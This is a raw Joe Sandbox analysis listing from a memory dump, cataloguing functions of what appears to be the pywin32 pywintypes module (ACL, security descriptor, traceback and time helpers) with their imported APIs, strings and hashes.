PyType_Ready.PYTHON313 ref: 00007FF8B7E8DDD2
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DDF2
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DE0E
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DE20
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DE3C
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8DE66

Strings

Could not initialise the error objects, xrefs: 00007FF8B7E8DE5C
SECURITY_DESCRIPTORType, xrefs: 00007FF8B7E8DCA7
ACLType, xrefs: 00007FF8B7E8DD49
IIDType, xrefs: 00007FF8B7E8DC71
WAVE_FORMAT_PCM, xrefs: 00007FF8B7E8DC18
error, xrefs: 00007FF8B7E8DB99
WAVEFORMATEXType, xrefs: 00007FF8B7E8DE35
TimeType, xrefs: 00007FF8B7E8DC3B
DEVMODEType, xrefs: 00007FF8B7E8DE07
HANDLEType, xrefs: 00007FF8B7E8DD7F
SECURITY_ATTRIBUTESType, xrefs: 00007FF8B7E8DCDD
OVERLAPPEDType, xrefs: 00007FF8B7E8DDB5
FALSE, xrefs: 00007FF8B7E8DBF9
TRUE, xrefs: 00007FF8B7E8DBD9
DEVMODEWType, xrefs: 00007FF8B7E8DDEB
SIDType, xrefs: 00007FF8B7E8DD13
com_error, xrefs: 00007FF8B7E8DBB9

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Dict_String$Item$ReadyType_$State_SwapThread$Module_$ErrorFatalFunc$AllocConstantCreate2DeallocDecodeDictErr_LocalUnicode_Value
String ID: ACLType$Could not initialise the error objects$DEVMODEType$DEVMODEWType$FALSE$HANDLEType$IIDType$OVERLAPPEDType$SECURITY_ATTRIBUTESType$SECURITY_DESCRIPTORType$SIDType$TRUE$TimeType$WAVEFORMATEXType$WAVE_FORMAT_PCM$com_error$error
API String ID: 2302314715-313003814
Opcode ID: de223336d6068828db36fb0dc1bb87c70e4bd450320daeffceca65b23cb5c0d5
Instruction ID: aef127bf2637e775221334eb030071507ff50a84e194cbfe2e8c173d6c3b1f29
Opcode Fuzzy Hash: de223336d6068828db36fb0dc1bb87c70e4bd450320daeffceca65b23cb5c0d5
Instruction Fuzzy Hash: 5591B665D18B0391F6089BACFC581BC2761AF55FE4F940632E62E821F1EF7CE95AC250

Function 00007FF8B7E8E090 Relevance: 77.2, APIs: 25, Strings: 19, Instructions: 225COMMON

Download Yara Rule

APIs

PyImport_ImportModule.PYTHON313 ref: 00007FF8B7E8E0C7
PyImport_ImportModule.PYTHON313 ref: 00007FF8B7E8E0E8
_wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B7E8E307
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8E32B
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8E345
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8E35E
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8E379
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8E393
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8E3AF
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8E3C8
PyMem_Free.PYTHON313 ref: 00007FF8B7E8E3D6

Strings

<NULL!!>, xrefs: 00007FF8B7E8E2E2
print_exception, xrefs: 00007FF8B7E8E145
<Error getting traceback - can't import traceback>, xrefs: 00007FF8B7E8E0F6
<Error getting traceback - can't import cStringIO>, xrefs: 00007FF8B7E8E0D5
<Error getting traceback - traceback.print_exception() failed>, xrefs: 00007FF8B7E8E1E9
<Error getting traceback - can't make print_exception arguments>, xrefs: 00007FF8B7E8E1C9
<Error getting traceback - can't find cStringIO.StringIO>, xrefs: 00007FF8B7E8E11A
<Error getting traceback - getvalue() did not return a string>, xrefs: 00007FF8B7E8E300
traceback, xrefs: 00007FF8B7E8E0E1
Getting WCHAR string, xrefs: 00007FF8B7E8E290
StringIO, xrefs: 00007FF8B7E8E102
<Error getting traceback - can't find getvalue function>, xrefs: 00007FF8B7E8E220
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E8E2F0
getvalue, xrefs: 00007FF8B7E8E208
<Error getting traceback - getvalue() failed.>, xrefs: 00007FF8B7E8E252
<Error getting traceback - cStringIO.StringIO() failed>, xrefs: 00007FF8B7E8E139
None is not a valid string in this context, xrefs: 00007FF8B7E8E2C5
OOOOOi, xrefs: 00007FF8B7E8E1B4
<Error getting traceback - can't find traceback.print_exception>, xrefs: 00007FF8B7E8E15D

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Dealloc$ImportImport_Module$FreeMem__wcsdup
String ID: <Error getting traceback - cStringIO.StringIO() failed>$<Error getting traceback - can't find cStringIO.StringIO>$<Error getting traceback - can't find getvalue function>$<Error getting traceback - can't find traceback.print_exception>$<Error getting traceback - can't import cStringIO>$<Error getting traceback - can't import traceback>$<Error getting traceback - can't make print_exception arguments>$<Error getting traceback - getvalue() did not return a string>$<Error getting traceback - getvalue() failed.>$<Error getting traceback - traceback.print_exception() failed>$<NULL!!>$Getting WCHAR string$None is not a valid string in this context$OOOOOi$Objects of type '%s' can not be converted to Unicode.$StringIO$getvalue$print_exception$traceback
API String ID: 2735870070-3599414692
Opcode ID: 0043d422bc0162b250e8750caf090f3e3b7605d422a7505aa728d4c321d93bbf
Instruction ID: 1fc1190ca7a300b7c5f947e5f12ddfa7262e129df957fcf995e18fc6450faa51
Opcode Fuzzy Hash: 0043d422bc0162b250e8750caf090f3e3b7605d422a7505aa728d4c321d93bbf
Instruction Fuzzy Hash: 69A1D522A0DB42D9FA559B5AE85827D23A5BF55FC5F884035EB0E426B6EF3CE944C300

Function 00007FF8B7E82600 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 175COMMON

Download Yara Rule

APIs

GetExplicitEntriesFromAclW.ADVAPI32 ref: 00007FF8B7E82623
PyTuple_New.PYTHON313 ref: 00007FF8B7E82651
PyErr_SetString.PYTHON313 ref: 00007FF8B7E826FB
Py_BuildValue.PYTHON313 ref: 00007FF8B7E8287C
PyTuple_SetItem.PYTHON313 ref: 00007FF8B7E82890
LocalFree.KERNEL32 ref: 00007FF8B7E82908

Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA

Strings

AccessMode, xrefs: 00007FF8B7E8284A
MultipleTrusteeOperation, xrefs: 00007FF8B7E82834
Identifier, xrefs: 00007FF8B7E82681, 00007FF8B7E827EC, 00007FF8B7E8289A
TrusteeType, xrefs: 00007FF8B7E82690, 00007FF8B7E827E5, 00007FF8B7E828A4
Invalid value for TrusteeForm, xrefs: 00007FF8B7E826F1
GetExplicitEntriesFromAcl, xrefs: 00007FF8B7E8262F
Trustee, xrefs: 00007FF8B7E826BA
{s:O,s:l,s:l,s:l,s:N}, xrefs: 00007FF8B7E82800
TrusteeForm not yet supported, xrefs: 00007FF8B7E82710
{s:l,s:l,s:l,s:N}, xrefs: 00007FF8B7E82860
AccessPermissions, xrefs: 00007FF8B7E82856
MultipleTrustee, xrefs: 00007FF8B7E82811
TrusteeForm, xrefs: 00007FF8B7E8269F, 00007FF8B7E827DE, 00007FF8B7E828AB
Inheritance, xrefs: 00007FF8B7E826AB, 00007FF8B7E827D7

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: BuildErr_FreeLocalTuple_Value$DecodeEntriesErrorExplicitFormatFromItemLastMessageObjectStringUnicode_
String ID: AccessMode$AccessPermissions$GetExplicitEntriesFromAcl$Identifier$Inheritance$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$Trustee$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}${s:l,s:l,s:l,s:N}
API String ID: 1576682769-3224252679
Opcode ID: 5a51bc5ec4fdc2f2b2449b67a7b18b879f8b3dee29234ec28016f6faf2fd6655
Instruction ID: 374ba2334f4f6d83aa4d1a6a3b0cc61a12e5710dd13833259a0f8e5056345f7a
Opcode Fuzzy Hash: 5a51bc5ec4fdc2f2b2449b67a7b18b879f8b3dee29234ec28016f6faf2fd6655
Instruction Fuzzy Hash: B1910236A08B8686EA608F59E44026D73A8FF48FD0F944036DB8D87775DE3DE689C740

Function 00007FF8B7E8A0B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 207COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON313 ref: 00007FF8B7E8A0E8
PyObject_GetAttrString.PYTHON313 ref: 00007FF8B7E8A11D
PyErr_Clear.PYTHON313 ref: 00007FF8B7E8A12B

Part of subcall function 00007FF8B7E8A720: Py_BuildValue.PYTHON313(?,?,00000000,00007FF8B7E8A1B2), ref: 00007FF8B7E8A72F

PyObject_CallObject.PYTHON313 ref: 00007FF8B7E8A138
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8A14E
PyNumber_Check.PYTHON313 ref: 00007FF8B7E8A163
PyNumber_Long.PYTHON313 ref: 00007FF8B7E8A170
PyLong_AsLong.PYTHON313 ref: 00007FF8B7E8A185
PyErr_Occurred.PYTHON313 ref: 00007FF8B7E8A190
PyErr_BadArgument.PYTHON313 ref: 00007FF8B7E8A19F
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8A2B0
_mktime64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B7E8A2BE
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8A2DB
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8A332
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8A3A1
PyErr_Format.PYTHON313 ref: 00007FF8B7E8A3C2
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8A3DC

Strings

mktime argument out of range, xrefs: 00007FF8B7E8A2D1
iiiiiiiii|i, xrefs: 00007FF8B7E8A1F6
Objects of type '%s' can not be used as a time object, xrefs: 00007FF8B7E8A3AD
(d), xrefs: 00007FF8B7E8A342
year out of range, xrefs: 00007FF8B7E8A328
timetuple, xrefs: 00007FF8B7E8A0FE

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Dealloc$String$LongNumber_Object_$ArgumentAttrBuildCallCheckClearFormatLong_ObjectOccurredSubtypeType_Value_mktime64
String ID: (d)$Objects of type '%s' can not be used as a time object$iiiiiiiii|i$mktime argument out of range$timetuple$year out of range
API String ID: 3975405178-3179837657
Opcode ID: 3ef851e5d06e54bdc5a790e60f5679cb7fcdb0b9f7579482d87791eaca5b7d75
Instruction ID: c9e2660ac3108d77025efd2238dd54bd5e311e8da2b8e53b69ed4298c900e8a2
Opcode Fuzzy Hash: 3ef851e5d06e54bdc5a790e60f5679cb7fcdb0b9f7579482d87791eaca5b7d75
Instruction Fuzzy Hash: A9A12932A09B4285FB658F69E8442BD23A4EF45FD4F844235EB4E567A6EF3CE544C700

Function 00007FF8B7E83F20 Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 189COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E83F4D
PySequence_Check.PYTHON313 ref: 00007FF8B7E83F5F
PyErr_SetString.PYTHON313 ref: 00007FF8B7E83F7A
PySequence_Size.PYTHON313 ref: 00007FF8B7E83FA4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83FB8
memset.VCRUNTIME140 ref: 00007FF8B7E83FD1
PyErr_SetString.PYTHON313 ref: 00007FF8B7E83FEC
PySequence_GetItem.PYTHON313 ref: 00007FF8B7E8402B
PyTuple_New.PYTHON313 ref: 00007FF8B7E84065
PyArg_ParseTupleAndKeywords.PYTHON313 ref: 00007FF8B7E8409F
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E840B8
PyErr_SetString.PYTHON313 ref: 00007FF8B7E840D4
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E840FB
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E84115
SetEntriesInAclW.ADVAPI32 ref: 00007FF8B7E84149
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E84179
PyMem_Free.PYTHON313 ref: 00007FF8B7E8419E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E841B1
LocalFree.KERNEL32 ref: 00007FF8B7E841E2

Strings

EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}, xrefs: 00007FF8B7E840CA
SetEntriesInAcl: unable to allocate EXPLICIT_ACCESS_W, xrefs: 00007FF8B7E83FE2
Parm must be a list of EXPLICIT_ACCESS dictionaries, xrefs: 00007FF8B7E83F70
O:SetEntriesInAcl, xrefs: 00007FF8B7E83F38
lllO, xrefs: 00007FF8B7E84086
SetEntriesInAcl, xrefs: 00007FF8B7E84159

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Dealloc$Err_Sequence_String$Arg_FreeParseTuple$CheckEntriesItemKeywordsLocalMem_SizeTuple_freemallocmemset
String ID: EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}$O:SetEntriesInAcl$Parm must be a list of EXPLICIT_ACCESS dictionaries$SetEntriesInAcl$SetEntriesInAcl: unable to allocate EXPLICIT_ACCESS_W$lllO
API String ID: 1438466550-1140684800
Opcode ID: acf0275f699249ee3a72eaa94773bbe7f7b2b370675f5fc8c16df187906dc64b
Instruction ID: 282942859632e4dc295ba37f5fb0bd6bd2dd8457dcc458130300c6902b88fefd
Opcode Fuzzy Hash: acf0275f699249ee3a72eaa94773bbe7f7b2b370675f5fc8c16df187906dc64b
Instruction Fuzzy Hash: 66811926A08B8286EB509F69E84427E63A4FF96FC4F984135EB4E43666DF3CE455C700

Function 00007FF8B7E85BE0 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 164COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E85C21
_Py_NewReference.PYTHON313 ref: 00007FF8B7E85D0E
PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E85D85
PyErr_SetString.PYTHON313 ref: 00007FF8B7E85DA4
CLSIDFromString.OLE32 ref: 00007FF8B7E85DB6
CLSIDFromProgID.OLE32 ref: 00007FF8B7E85DC7
PyMem_Free.PYTHON313 ref: 00007FF8B7E85DD6
PyErr_SetString.PYTHON313 ref: 00007FF8B7E85C5A

Part of subcall function 00007FF8B7E8E768: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8E782

PyObject_GetBuffer.PYTHON313 ref: 00007FF8B7E85C6E
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E85C89
PyErr_Format.PYTHON313 ref: 00007FF8B7E85CA3
PyErr_Format.PYTHON313 ref: 00007FF8B7E85CD9
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E85D32
PyErr_SetString.PYTHON313 ref: 00007FF8B7E85E33

Strings

<NULL!!>, xrefs: 00007FF8B7E85E46
Buffer cannot be None, xrefs: 00007FF8B7E85C49
O|i, xrefs: 00007FF8B7E85C1A
Getting WCHAR string, xrefs: 00007FF8B7E85D93
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E85E4D
string too small - must be at least %d bytes (got %d), xrefs: 00007FF8B7E85CC8
Buffer length can be at most %d characters, xrefs: 00007FF8B7E85C92
None is not a valid string in this context, xrefs: 00007FF8B7E85E22

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String$Buffer_FormatFromRelease$Arg_BufferCharFreeMem_Object_ParseProgReferenceTupleUnicode_Widemalloc
String ID: <NULL!!>$Buffer cannot be None$Buffer length can be at most %d characters$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$O|i$string too small - must be at least %d bytes (got %d)
API String ID: 4105764891-2902820477
Opcode ID: 617d2196de1cec3ed8d6d8ab3add72d5df5a5d96e77225db4f40206af1f54af4
Instruction ID: 3c6ec5e9251a7622033347f63fc9d7de783b8220816fef0afd89409e2d349377
Opcode Fuzzy Hash: 617d2196de1cec3ed8d6d8ab3add72d5df5a5d96e77225db4f40206af1f54af4
Instruction Fuzzy Hash: 1081C726A09B4295FB548FA9D8542BC23A1AF48FC8F845436DF0E576B6EF3CE545C340

Function 00007FF8B7E87610 Relevance: 42.1, APIs: 17, Strings: 7, Instructions: 136COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8763D
_Py_NewReference.PYTHON313 ref: 00007FF8B7E87671
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E87681
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E87696
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E876AE
PyErr_Occurred.PYTHON313 ref: 00007FF8B7E876BA
PyErr_SetString.PYTHON313 ref: 00007FF8B7E876D6
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E876E9

Part of subcall function 00007FF8B7E87D20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D3B
Part of subcall function 00007FF8B7E87D20: GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D44

PyErr_Clear.PYTHON313 ref: 00007FF8B7E876FA
PyErr_SetString.PYTHON313 ref: 00007FF8B7E87754

Part of subcall function 00007FF8B7E875D0: GetSecurityDescriptorControl.ADVAPI32 ref: 00007FF8B7E875DE

PyObject_GetBuffer.PYTHON313 ref: 00007FF8B7E87769
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E87787
PyErr_Format.PYTHON313 ref: 00007FF8B7E877A1
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E877BE
PyErr_SetString.PYTHON313 ref: 00007FF8B7E877D9
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8771C

Part of subcall function 00007FF8B7E8E768: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8E782

PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8782B

Strings

Data is not a valid security descriptor, xrefs: 00007FF8B7E877C8
|l:SECURITY_DESCRIPTOR, xrefs: 00007FF8B7E87633
Buffer cannot be None, xrefs: 00007FF8B7E87743
O:SECURITY_DESCRIPTOR, xrefs: 00007FF8B7E87712
Security descriptor created from a buffer must be self relative, xrefs: 00007FF8B7E877ED
Security descriptors are not supported on this platform, xrefs: 00007FF8B7E876C5
Buffer length can be at most %d characters, xrefs: 00007FF8B7E87790

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$DescriptorSecurity$String$Arg_Buffer_ParseReleaseTuplefreemalloc$BufferClearControlDeallocFormatInitializeLengthObject_OccurredReferenceValid
String ID: Buffer cannot be None$Buffer length can be at most %d characters$Data is not a valid security descriptor$O:SECURITY_DESCRIPTOR$Security descriptor created from a buffer must be self relative$Security descriptors are not supported on this platform$|l:SECURITY_DESCRIPTOR
API String ID: 929864077-2729865943
Opcode ID: 907e45069e2a562dd984d1ee0477dffeda1de1be7776d16703d8a25f67731b20
Instruction ID: d6469658fbac9a8bfceaac23c198b84a1ee8719e07742fa3b144c692fd4e8faa
Opcode Fuzzy Hash: 907e45069e2a562dd984d1ee0477dffeda1de1be7776d16703d8a25f67731b20
Instruction Fuzzy Hash: 14610522A18B4292FB509B9DE99027D63A1BF85FC0F944035EB4E57AB6EF3CE445C300

Function 00007FF8B7E87A80 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 181COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E87AC5
PyErr_Format.PYTHON313 ref: 00007FF8B7E87AE8
memset.VCRUNTIME140 ref: 00007FF8B7E87AFF
MakeAbsoluteSD.ADVAPI32 ref: 00007FF8B7E87B47

Strings

(, xrefs: 00007FF8B7E87B5E
Unable to allocate %d bytes, xrefs: 00007FF8B7E87ADA, 00007FF8B7E87BBA, 00007FF8B7E87C01
MakeAbsoluteSD, xrefs: 00007FF8B7E87CAC

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: AbsoluteErr_FormatMakemallocmemset
String ID: ($MakeAbsoluteSD$Unable to allocate %d bytes
API String ID: 1436552674-2130869594
Opcode ID: 817e4bd11004b34f0d9ee0657aa47416c8f7398feaa8474a98fd3fe14e7fbdd3
Instruction ID: f7afb32747edae3d71e4a349b1f67255e62d68d922ac0671e6ea998d16156326
Opcode Fuzzy Hash: 817e4bd11004b34f0d9ee0657aa47416c8f7398feaa8474a98fd3fe14e7fbdd3
Instruction Fuzzy Hash: CF811A32A09B428AFB55CFAAA8406AD37A1BF48FD8F444435EE4D57B65EF3CD4448700

Function 00007FF8B7E82410 Relevance: 38.6, APIs: 9, Strings: 13, Instructions: 113COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E82448
PyErr_SetString.PYTHON313 ref: 00007FF8B7E82466
PyUnicode_FromWideChar.PYTHON313 ref: 00007FF8B7E824AA
Py_BuildValue.PYTHON313 ref: 00007FF8B7E825A2
Py_BuildValue.PYTHON313 ref: 00007FF8B7E825EB

Strings

AccessMode, xrefs: 00007FF8B7E825AB
MultipleTrusteeOperation, xrefs: 00007FF8B7E8255B
Identifier, xrefs: 00007FF8B7E8254F
TrusteeType, xrefs: 00007FF8B7E8257C
Invalid value for TrusteeForm, xrefs: 00007FF8B7E8243E
Trustee, xrefs: 00007FF8B7E825BE
{s:O,s:l,s:l,s:l,s:N}, xrefs: 00007FF8B7E82571
TrusteeForm not yet supported, xrefs: 00007FF8B7E8245C
{s:l,s:l,s:l,s:N}, xrefs: 00007FF8B7E825CA
AccessPermissions, xrefs: 00007FF8B7E825B7
MultipleTrustee, xrefs: 00007FF8B7E82567
TrusteeForm, xrefs: 00007FF8B7E8258F
Inheritance, xrefs: 00007FF8B7E825D8

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: BuildErr_StringValue$CharFromUnicode_Wide
String ID: AccessMode$AccessPermissions$Identifier$Inheritance$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$Trustee$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}${s:l,s:l,s:l,s:N}
API String ID: 4150572817-4268317626
Opcode ID: c98c665ab8a0a4017fd0a264350303892bf8c1112e9847fedee4e5de0a27f4e9
Instruction ID: cb879e31a764bdf946eb30bcd986a7f64a9480c18552e11e0b0fb5bb80b9de52
